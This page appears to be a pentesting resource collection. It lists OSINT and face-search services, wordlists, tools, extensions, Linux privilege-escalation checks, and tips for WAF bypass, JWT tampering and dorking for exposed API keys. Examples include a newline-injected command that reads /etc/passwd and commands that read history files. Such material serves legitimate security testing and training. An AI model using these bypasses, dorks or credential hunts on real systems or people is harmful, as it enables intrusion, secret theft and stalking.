  • SmashTheStack - consists of 7 different wargames: Amateria, Apfel (currently offline), Blackbox, Blowfish, CTF (currently offline), Logic, and Tux. Each wargame contains a variety of tasks ranging from standard vulnerabilities to reverse engineering challenges
  • Microcorruption - is a CTF where you need to "reverse" fictional electronic locking devices called Lockitall. Lockitall devices protect bonds stored in warehouses owned by the fictional company CyYombinator. On the way to stealing the bonds, you will learn about assembly language, how to use a debugger, step through code, set breakpoints, and explore memory
  • The platform pwn0 - is a VPN where almost anything can happen. Fight against bots or users and earn points by gaining control over other systems

          MSFVenom help

  • gist.github
  • Cheat Sheet

          OSINT and Information Gathering

  • OSINT FrameworkAggregation of all popular tools and resources for OSINT
  • Archive of sites history
  • Babel street.
  • Crt.sh
  • Securityheaders. Check target site headers
  • chaos.projectdiscovery.io
  • Fofa. Passive scaner like shodan
  • Netlas.io. Discover, scan and monitor any online assets
  • Intelx.io. Search engine woth leak from darkweb resourses
  • DNSdumpster for passive and fast search domains and subdomains and etc
  • Urldna.io. Free, complex, power tool for research web. Collect ssl info, ip addreses, headers, cookies, some info about techs and etc
  • Web-check.xyz. In just 20 seconds, you can see what attackers already know
  • Have I been pwned. Emails leak
  • Dehashed.Another source of emails leak
  • Geospy. This is an online service for determining the physical address of the location depicted in a photograph
  • Google Alert. Notifies you when the specified information appears on the Internet
  • ViewDNS Offers reverse IP Lookup
  • Netcraft. Information about domain. Temple of searching:
    https://sitereport.netcraft.com/?url=<TARGET_URL>
  • Shodan is the world's first search engine for Internet-connected devices.
  • SecurityHeaders Scanner of headers security
  • Observatory.mozilla Scanner of headers security
  • This is a system that gathers all available information about companies and extracts data from it
  • Censys Search Can provide a lot of information about IP addresses and domains
  • Robtex Whois like tool. Techs, servers, ips, dns configuration and another info about target
  • DataBase SSL/TLS-certificates issued for domain names
  • Metasearch Engine:
    1. Fagan Finder - is an excellent source of information. You enter a query, then click on the desired source. Then you are redirected to the relevant page. The most important thing is that it shows how many sources there can be and how diverse they can be: from the Library of Congress website to leak publication services
    2. Intelligence X - it not only searches for leaks but also helps navigate other OSINT tools. Services for email verification, DNS search - you'll find them here too. Go to the Tools section and search specifically
  • Tools for people search by photo:
    1. Social Catfish - is the perfect facial recognition search engine that can search for people by face, name, email, address, and username
    2. Spokeo - is a database used for identifying people and providing accurate information about them. It is constantly updated and boasts over 6 million consumers, 130 million property records, 600 million legal records, and over 120 social networks, making it an ideal people search system for personal and business use
    3. Google Image Search - uses the powerful Google Bot to scan all publicly accessible websites for images to create the largest and most frequently updated image database in the world
    4. PimEyes - is one of the best facial recognition search engine tools that allows you to perform in-depth image searches on the internet. Advanced convolutional neural networks analyze the image you upload to find objects and match them with the database
    5. FaceCheck.ID - is one of the best reverse image search tools for facial recognition. You can use it to search for images of a specific person. It identifies faces in the photo you upload, and then finds similar faces in social media posts, online videos, fraudulent accounts, websites, news and blog pages, as well as in product marketing

         Password Services

  • wordlists.assetnote.io/
  • CIRT.net Default Passwords service
  • Default-Password.info Default Passwords service
  • Datarecovery.com Default Passwords service
  • Passwordsdatabase another one default passwords service
  • This wiki page includes the most well-known collections of passwords
  • Weekpass.com is a collection of password lists for various purposes from penetration testing to improving password security

          Dashboards for Cyber Threat Monitoring

  • cybermap.kaspersky. A colorful globe designed in the best traditions of Hollywood hacker movies. Its real value lies not in its design but in the informative panel with statistics collected from the company's security products. Additionally, Kaspersky Lab supports a dashboard with information on current threats, located here.
  • Live Threat Map. Here, you can view summary statistics on cyberattacks over the last hour, day, or month, as well as highlight the most targeted countries, top attack vectors, and most scanned ports.
  • Talos Reputation Center. A dashboard with general information on cyber threats, created by Talos with support from Cisco.
  • Cyber Attack Map. A map featuring the top spam and malware-spreading servers.
  • Sicherheitstacho. A cyberattack dashboard from Deutsche Telekom, which operates on the open-source honeypot network: T-Pot.

          Other

  • fpcentral.irisa.fr. Check fingerprint
  • amiunique.org. Like from above
  • blindf.com. Helps with Blind XSS
  • Shazzer. Shared online fuzzing

    <-- Back

    Tools

    1. GitHub Tools
    2. Browsers extensions. Note: Chrome extensions also work with Brave Browser
    3. Burp Suite Extensions
    4. Kali Tools
    5. Platforms for hacking and pentesting

          GitHub Tools

    My GitHub stars where I categorized github tools.

    👇Some of the most awesome tools (IHMO)👇

    1. BruteForce & Wordlists
    2. Enumiration
    3. OSINT
    4. Payloads
    5. Privilege Escalation
    6. Social Engineering
    7. Looking for exploits and vulnerabilities
    8. Another
    1. BruteForce and Wordlists

      • Active Directory Wordlists contains User.txt and Pass.txt
      • BruteForce Database
      • YAWR. Yet Another Wordlists Repo. Contains OS,RECON,WEB,brute folders
      • Crunch

        This is one of many powerful tools for creating an offline wordlist. With crunch, you can specify numerous options, including min, max, and options. The following example creates a wordlist containing all possible combinations of 3 characters, including 1-5 and qwerty. You can use the -o argument to save.

        Example:

         crunch 3 3 12345qwerty -o cranch.txt 
      • Top wordlists by DanielMiessler
      • DNS asynchronous bruteforce
      • Tool for hash identification.

        Python file. Powerful. User friendly interface.

      • Kerberos bruteforcing
      • Username generator

        Could help create a list with most of the possible combinations if we have a first name and last name. Use git clone and

         python3 username_generator.py -h 
        shows the tool's help message and optional arguments.
      • Wordlists by kkrypt0nn. A collection of wordlists for many different usages
    2. Enumiration

      • WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools
      • Certipy. Tool for Active Directory Certificate Services enumeration and abuse
      • Fuzzer
      • fuzzdb
      • Knock.py - subdomain scanner
      • Linux smart enumiration
      • Sublist3r. Subdomains enumiration python tool
    3. OSINT

    4. Payloads

      • All kind of payloads and bypasses
      • Payloads for Unix and Windows OS
      • XSS-LOADER. All in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER
      • XSS payloads
    5. Privilege Escalation

    6. Social Engineering

      • Awesome social engineering resources
      • SET. Social Engineer Toolkit
    7. Looking for exploits and vulnerabilities

      • Searchsploit - provides direct access to the Exploit Database from the Kali Linux terminal. Users can utilize powerful search commands to quickly discover exploits and vulnerabilities. This tool is an indispensable assistant for security professionals working in the Kali Linux environment
      • getsploit - combines the functionality of searchsploit with the ability to download exploits. It allows users to conduct online searches across databases such as Exploit-DB, Metasploit, and Packetstorm. Additionally, it provides the capability to download exploit source code directly, making the search and retrieval of necessary data for pentesting simple and effective
      • CVEMap - a tool from Projectdiscovery designed for quick and convenient searching across all known vulnerability databases
      • Pompem - a tool pre-installed in Parrot OS, automates the process of searching for exploits and vulnerabilities. It uses an advanced search system to check databases such as PacketStorm Security, CXSecurity, ZeroDay, Vulners, and NVD
      • SiCat - stands out for its comprehensive approach to exploit searching. It adeptly extracts information about exploits from open sources and local repositories
    8. Another

      • Wapiti. Web vulnerability scanner
      • Bearer. Scans source code against top security and privacy risks
      • CrackMapExec. A swiss army knife for pentesting networks
      • BloodHound. Six Degrees of Domain Admin
      • Cewl can be used to effectively crawl a website and extract strings or keywords. Cewl is a powerful tool to generate a wordlist specific to a given company or target. Consider the following example below:
         cewl -w list.txt -d 5 -m 5 http://target_site.com 

        -w will write the contents to a file, here is list.txt.

        -m 5 gathers strings (words) that are 5 characters or more

        -d 5 is the depth level of web crawling/spidering (default 2)

        http://target_site.com is the URL that will be used

        As a result, now have a decently sized wordlist based on relevant words for the specific enterprise, like names, locations, and a lot of their business lingo. Similarly, the wordlist that was created could be used to fuzz for usernames.

      • Hexeditor

        Tools for change files signature. Link to Wiki with List of file signatures.

      • Lynis. Check Linux security
      • Pspy. Great for enumeration of Linux systems in CTFs and more.
      • Hash Identifier . Python file. Powerful. User friendly interface.

          Browser extensions

    • Wappalyzer (FireFox | Chrome) - Defines CMS, JS-libraries, frameworks and another technologies used on the site
    • Foxy Proxy (FireFox | Chrome) - Fast change proxy, for example, use with Burp Suite
    • Rested (FireFox) - Quick request sender. Usefull with API
    • Alratir (FireFox | Chrome) - help with GraphQL requests
    • HackTools (FireFox | Chrome) - is a web extension facilitating your web application penetration tests, it includes cheat sheets as well as all the tools used during a test such as XSS payloads, Reverse shells to test your web application
    • Cookie Editor (FireFox | Chrome) - Allows you to change, delete, add cookie values for various testing purposes. Can be tested for access control errors, privilege escalation, etc
    • Hackbar (FireFox | Chrome) - Contains payloads for XSS attacks, SQL injections, WAF bypass, LFI, etc
    • ModHeader (FireFox | Chrome) - Helps to easily change HTTP request and response headers in the browser
    • User-Agent Switcher (FireFox | Chrome)
    • Wayback Machine (FireFox | Chrome) - Official Internet Archive Wayback Machine Browser Extension. Non official for FireFox
    • Firefox Multi-Account Containers. Lets you keep parts of your online life separated into color-coded tabs.
    • Beautifer & Minify (FireFox | Chrome) - Brings readable CSS, HTML and JavaScript code
    • BuiltWith (FireFox | Chrome) - Get web app technologies
    • DotGit (FireFox | Chrome) - An extension to check for the presence of .git on websites you visit. Also checks open .env files, security.txt and more
    • Email Extractor (FireFox | Chrome) - Automatically saves email addresses from the web pages visit. Helps with social engineering attacks, brute force attacks, etc
    • Exif-Viewer (FireFox | Chrome) - Help to check photo metadata
    • Fake Filler (FireFox | Chrome) - Simplifies and speeds up testing of fillable forms by developers and testers. Helps to populate all input forms (text fields, areas, dropdowns, etc.) with fake and randomly generated data
    • Knoxss (FireFox) - Finds XSS vulnerabilities. Community Edition and Pro Version
    • Nimbus Screenshot (FireFox | Chrome) - To make screenshot
    • Privicy Badger (FireFox | Chrome) - utomatically learns to block invisible trackers
    • Temp Mail (FireFox) - Temporary disposable email address. Protect your email from spam, bots and phishing with Temp-Mail
    • Retire.js (FireFox | Chrome) - Displays the resence of vulnerable JavaScript libraries. This helps to find known vulnerabilities in JS and some CVEs affecting sites with vulnerable JS libraries
    • Shodan (FireFox | Chrome) - The Shodan plugin tells you where the website is hosted (country, city), who owns the IP and what other services/ ports are open
    • Ublock Origin (FireFox | Chrome) - An efficient wide-spectrum content blocker
    • Chaff (Chrome) - Generate fake traffic
    • TruffleHog Chrome Extension (FireFox | Chrome) - Scans the websites you visit looking for API keys and credentials and notifies you if they are found
    • OWASP Penetration Testing Kit (FireFox | Chrome) - help with checks for commin bug
    • Vulners Web Scanner (FireFox | Chrome) - Tiny and passive vulnerability scanner based on vulners.com vulnerability database
    • Web Developer (FireFox | Chrome) - Adds a toolbar button with various web developer tools
    • Panic Button (FireFox | Chrome) - Quickly hide all browser windows with a click of a button

          Burp Suite Extensions

    • Autorize help to detect authorization vulnerabilities
    • Logger++ allows advanced filters to be defined to highlight interesting entries or filter logs to only those which match the filter
    • PyCrypt enables users to encrypt and decrypt requests and response for manual and automated application penetration testing
    • JWT Editor. Is a extension or editing, signing, verifying, encrypting and decrypting JSON Web Tokens (JWTs)
    • Software Vulnerability Scanner - This extension displays public vulnerabilities for applications detected in the traffic proxied by Burp. Essentially, it acts as a layer between Burp and the API of this excellent vulnerability aggregator
    • Backslash Powered Scanner - Enhances Burp's active scanner using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities
    • CSTC, Modular HTTP Manipulator - CyberChef integrated in BurpSuite with live modification of requests at your fingertips
    • SQLiPy - A tool that integrates Burp Suite with SQLMap using the SQLMap API to check for SQL injection vulnerabilities
    • Active Scan++ - Expands the range of checks performed by the active and passive scanners. It identifies vulnerabilities such as cache poisoning, DNS rebinding, various injections, and also performs additional checks to detect XXE injections and more
    • Turbo Intruder - A faster alternative to Intruder equipped with a scriptable engine for sending a large number of HTTP requests and analyzing the results. Useful when speed is required
    • Bypass WAF - A tool for bypassing web application firewalls (WAFs)
    • BurpJS Link Finder - Helps identify and discover links based on JavaScript in web applications
    • 403 Bypasser Extension - A tool designed to bypass 403 errors commonly encountered when attempting to access restricted areas of a website
    • InQL to assist in your GraphQL security testing efforts
    • Backslash Powered Scanner. This extension complements Burp's active scanner by using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities
    • Hackvertor is a tag-based conversion tool that supports various escapes and encodings including HTML5 entities, hex, octal, unicode, url encoding etc
    • OpenAPI Parser. Extension streamlines the process of assessing web services that use OpenAPI-based APIs
    • JS Link Finder. Extension for a passively scanning JavaScript files for endpoint links. - Export results the text file - Exclude specific 'js' files e.g. jquery, google-analytics (Professional)
    • Content Type Converter. This extension converts data submitted within requests between various common formats:
      • JSON To XML
      • XML to JSON
      • Body parameters to JSON
      • Body parameters to XML
    • Param miner. Extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities
    • Pentest Mapper. Is a extension that integrates the Burp Suite request logging with a custom application testing checklist
    • Piper makes integrating external tools into Burp easier

          Kali Tools

    1. Name That Hash - Instantly name the type of any hash (with hashcat command)
    2. name-that-hash --help
    3. wafw00f - This package identifies and fingerprints Web Application Firewall (WAF) products
    4. wafw00f -h
    5. gowitness is a website screenshot utility, that uses Chrome Headless to generate screenshots of web interfaces using the command line
    6. Commix is an open source penetration testing tool for command injections

         Platforms for hacking and pentesting

    <-- Back

    Privilege Escalation

    ENUMERATION is a key!

          Linux

    Some advice to Linux Privilege Escalation
    1. Check out user are running - whoami
    2. Check out groups does running user belong to - id
    3. Check out what is the server named - hostname
    4. Check out what subnet did land in - ifconfig or ip -a
    5. Check out kernel ( uname -a ) and OS version ( cat /etc/os-release )
    6. Check out screen version - screen -v
    7. Check out .ssh folder in /home/<USERNAME>/.ssh or /root/.ssh
    8. Check out all environment variables env
    9. Check out login shells exist on the server - cat /etc/shells
    10. Check out Cron Tab:
    11. ls -la /etc/cron.d

      ls -la /etc/init.d

    12. Check out setuid and setgid
    13. To find files with sticky bit:

      find / -perm -u=s -type f 2>/dev/null
      find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
      find / -perm -4000 2>/dev/null

      To check out rights

      ls -la
    14. Find world writable files for every users - find / -perm -2 -type f 2>/dev/null
    15. Check out NOPASSWD sudo command - sudo -l
    16. Check out PATH - echo $PATH
    17. Check out the routing table by route or netstat -rn
    18. Check out arp table - arp -a
    19. Check out environ:
    20.  cat /proc/self/environ 
    21. Check out history:
    22. history

      cat ~/.bash_history

      cat ~/.mysql_history

      cat ~/.nano_history

      cat ~/.php_history

      cat ~/.atftp_history

      cat ~/.*history | less - all history search

    23. Check out executable files in:
    24. home directory and /var/www or the same

    25. Check out some additional information about the host itself such as the CPU type/version - lscpu
    26. Check out logrotate version - logrotate --version. This github tool can help with privesc
    27. Look at:
      • Open ports
      • .bat and .bak files
      • Interesting permissions

          Windows

    1. systeminfo - information about the target system
    2. cmdkey /list - list any saved credentials\

    <-- Back

    Tips

    1. If you have JSON in request, try to change JSON to XML
    2. Command Injection   

      If you find Command Injection and the WAF blocks keywords, you can attempt a bypass method by adding a backslash and a newline character between the blacklisted words.

      c\%0aat /et\%0ac/pas\%0aswd
    3. If target use svg files, try to upload svg with XSS or XML payload
    4. Interesting file location:

      Windows hashes

        Local computer:
      • File: \%systemroot%\system32\config\SAM
      • Registry: HKEY_LOCAL_MACHINE\SAM
      • File: \%systemroot%\system32\confog\SECURITY
      • Registry: HKEY_LOCAL_MACHINE\SECURITY\SAM

        Active Directory:
      • %systemroot%\ntds\ntds.dit
    5. Identifying Algorithm from the first hash blocks:
      • Salted MD5 - $1$...
      • SHA-256 - $5$...
      • SHA-512 - $6$...
      • BCrypt - $2a$...
      • Scrypt - $7$...
      • Argon2 - $argon2i$...
    6. Headers:
      • X-Forwarded-For. (XFF) header is an HTTP header used to identify the original IP address of a client connecting to a web server through an HTTP proxy or load balancer. By including this header, the server can log and track the original client's IP address instead of the proxy or load balancer's IP.
    7. Virtual Box:
      • How to enable Nested VT-x in Windows:
        cd C:\Program Files\Oracle\VirtualBox
        VBoxManage.exe list vms
        VBoxManage.exe modifyvm <"NAME_OF_MACHINE"> --nested-hw-virt on
    8. Configuration files:
      • /.htaccess
      • /.htpasswd
      • /web.config
      • /.git/config
      • /nginx.conf
      • /server-status
      • /status
      • /cgi-bin/php.ini
    9. Secure your machine!
    10. mat2. Tool gets rid of metadata everywhere
    11. Unified Kill Chain

      1. Reconnaissance (MITRE Tactic TA0043)

      2. Weaponization (MITRE Tactic TA0001)

      3. Social Engineering (MITRE Tactic TA0001)

      4. Exploitation (MITRE Tactic TA0002)

      5. Persistence (MITRE Tactic TA0003)

      6. Defence Evasion (MITRE Tactic TA0005)

      7. Command & Control (MITRE Tactic TA0011)

      8. Pivoting (MITRE Tactic TA0008)/a>)

    12. Jenkins endpoints.
      • • /signup
      • • /jenkins/signup
    13. 403 Bypass
      • Try to change method to PATCH and add header Accept: application/json

    <-- Back

    GPTs (Agents) for Cybersecurity

    <-- Back

    OSINT

    1. Tools for searching data by email and logins

      Snusbase indexes information from leaks and provides access to searching compromised email addresses, logins, names, IP addresses, phone numbers, and password hashes

      Have I Been Pwned? is a data breach search engine. It allows you to check which incidents a specific email address has been involved in

      Hunter and Skymem - search for corporate email addresses by URL

      Whatsmyname - searches for accounts on various services by username. The service is based on publicly available JSON

      User Searcher - a free tool that helps find users by login on over 2,000 websites

      CheckUserNames, Instant, Namecheckr, Peekyou, Usersearch - online services for searching user accounts by username

    <-- Back

    API

    1. Tools
    2. Tips
    3. GraphQL

         Tools

         Tips ←

    1. Wordlists:
    2. seclists/Discovery/Web-Content/api/

      seclists/Discovery/Web-Content/api/objects.txt

      seclists/Discovery/Web-Content/api/actions.txt

      seclists/Discovery/Web-Content/swagger.txt

      seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt

    3. Try to:
      • Check the JS files to find api endpoints
      • Change methods
      • If BFLA doesn`t allow to see one record, try to get all (/users instead of /user/1)
      • Check numbers of version (for example v0, v1, v2, v3, v4 etc)
      • Fuzz parameters and/or query
      • Remove Bearer from Authorization header (Authorization: <JWT>)
    4. Endpoints:
    5. Google Dorking:
      • inurl:/api/admin site:target.com
      • inurl:"/wp-json/wp/v2/users" - Finds all publicly available WordPress API user directories
      • intitle:"index of" intext:"api"
      • intitle:"index.of" intext:"api.txt" - Finds publicly available API key files
      • inurl:"/api/*" intext:"index of" - Finds potentially interesting API directories
      • ext:php inurl:"api.php?action=" - Finds all sites with a XenAPI SQL injection vulnerability
      • intext:api filetype:env
      • intitle:"index of" api_key OR "api key" OR apiKey -pool - It lists potentially exposed API keys
      • intext:APIKey ext:js | xml | yaml | txt | conf | py intitle:"index of"
      • intitle:"index of" "api.yaml"
      • "api" ext:log
    6. Git Dorking:
      • filename:swagger.json
      • extension: .json
      • searching “api key,” "api keys", "apikey", "authorization: Bearer", "access_token", "secret", or “token.”
    7. Shodan:
      • port:80,443 http.status:200 "Content-Type: application/json"
      • "Content-Type: application/xml" - Find web servers returning potential endpoints that use XML (ie: SOAP)
      • "Content-Type: application/json" - Find web servers returning potential endpoints that use JSON
      • "wp-json" - This will search for web applications using the WordPress API
      • "X-*API*" hostname:"*.target.domain" - Find servers that contain custom headers related to “API”. ie: X-API-KEY, X-API-VERSION, X-API-ENV, X-AMZ-API-PATH etc
      • ssl.cert.subject.cn:target.domain - Find servers who have been issued an SSL cert for *.target.domain
      • ssl:"<Company Name"> - Find servers who have been issued an SSL cert relating to the company you are targeting. Useful for certs generated by SaaS/cloud vendors offering services to the target (ie: AWS, Azure, Google, etc). This typically finds stuff in the Issued To organization fields.
    8. Some resources:

         GraphQL

    1. Tools
    2. Wordlists:
    3. Request -> To Repeater -> right-click > GraphQL > Set introspection query. To insert an introspection query into the request body to see much more about GraphQL tree data and manipulate
    4. Endpoints:
      • /graphql
      • /graphiql
      • /api
      • /api/graphql
      • /graphql/api
      • /graphql?debug=1
      • /graphql/graphql
      • If these common endpoints don't return a GraphQL response, you could also try appending /v1 to the path

    <-- Back

    WordPress

    • Endpoints:

      wp-json/wp/v2/users

    <-- Back

    JWT

    Some tips:
    • Great tool for work with JWT - JWT_Tool
    • Try easy change params
    • Check delete all or delete a couple of chars of signature and send a response
    • Try to brute force signature key
    • Send a response without signature and set "alg":"none"(or None, or nOne, or NONE). Try send with and without second dot.
    • Try to use JWK if alg is asymmetric encryption (RS256, ES256 etc)
    • If there is a jku, try to put yourself url with a key

    <-- Back